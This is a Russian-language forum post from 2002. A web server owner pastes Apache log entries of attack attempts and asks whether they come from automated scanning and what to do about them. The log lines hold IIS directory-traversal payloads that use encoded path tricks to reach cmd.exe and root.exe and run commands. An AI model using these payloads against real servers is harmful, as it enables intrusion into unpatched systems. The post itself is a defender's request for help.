Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Постоянные интернет-атаки на Web - сервера.. 16.04.02 05:07 Число просмотров: 931
Автор: CETb2 Статус: Незарегистрированный пользователь Отредактировано 16.04.02 05:12 Количество правок: 1
|
Почему-то мой Apache выдает такие попытки к взлому:
24.33.15.53 - - [15/Apr/2002:14:46:44 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 274
24.33.15.53 - - [15/Apr/2002:14:46:45 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 272
24.33.15.53 - - [15/Apr/2002:14:46:46 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
24.33.15.53 - - [15/Apr/2002:14:46:47 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
24.33.15.53 - - [15/Apr/2002:14:46:48 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
24.33.15.53 - - [15/Apr/2002:14:46:49 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
24.33.15.53 - - [15/Apr/2002:14:46:53 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
24.33.15.53 - - [15/Apr/2002:14:46:54 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
24.33.15.53 - - [15/Apr/2002:14:46:55 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
24.33.15.53 - - [15/Apr/2002:14:46:56 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
24.33.15.53 - - [15/Apr/2002:14:46:57 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
24.33.15.53 - - [15/Apr/2002:14:46:58 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
24.33.15.53 - - [15/Apr/2002:14:46:59 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
24.33.15.53 - - [15/Apr/2002:14:47:00 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
24.33.15.53 - - [15/Apr/2002:14:47:01 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
24.33.15.53 - - [15/Apr/2002:14:47:02 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
Первое время я прям бушевал (мой комп взламывают) - отсылал письма провайдерам. А потом забил. Но атаки такого типа не прекратились :((
Причем некоторые из них по времени и по последовательности действий идентичны.. Как напримере - каждую секунду - другая попытка...
Может -ли быть это каким-то целенаправленным сканированием сетей какой-то программой , скриптом, или другим мехнаиз-момо ?
Кто посоветует, что делать ??, как быть ??
[CETb]
|
- Постоянные интернет-атаки на Web - сервера.. - CETb2 16.04.02 05:07 [931]
|
|
|